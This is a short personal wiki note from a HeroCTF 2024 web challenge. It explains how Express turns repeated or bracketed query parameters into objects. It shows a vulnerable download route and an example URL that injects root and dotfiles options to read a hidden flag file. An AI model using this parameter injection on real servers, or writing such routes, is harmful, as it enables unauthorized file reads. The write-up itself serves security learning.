osorin's abyss

User Tools

Site Tools

Trace: express-query-param
express-query-param

Express req.query Notes

Notes from HeroCTF 2024 SampleHub [WEB].

Given this code snippet: 

process.chdir(path.join(__dirname, "samples"));
app.get("/download/:file", (req, res) => {
    const file = path.basename(req.params.file);
    console.log(typeof req.query.filename);
    res.download(file, req.query.filename || "sample.png", (err) => {
        if (err) {
            res.status(404).send(`File "${file}" not found`);
        }
    });
});

req.query.filename (typeof) is string is request is something like: 

http://localhost:3000/download/whatever?filename=first

But req.query.filename (typeof) is object is request is something like: 

http://localhost:3000/download/whatever?filename=first&filename=second

We can also inject object properties like this: 

http://localhost:3000/download/.flag.txt?filename[root]=/&filename[dotfiles]=allow

req.query.filename type will also be object with something like: 

filename[whatever]
express-query-param.txt · Last modified: 2024/11/01 09:07 by osorin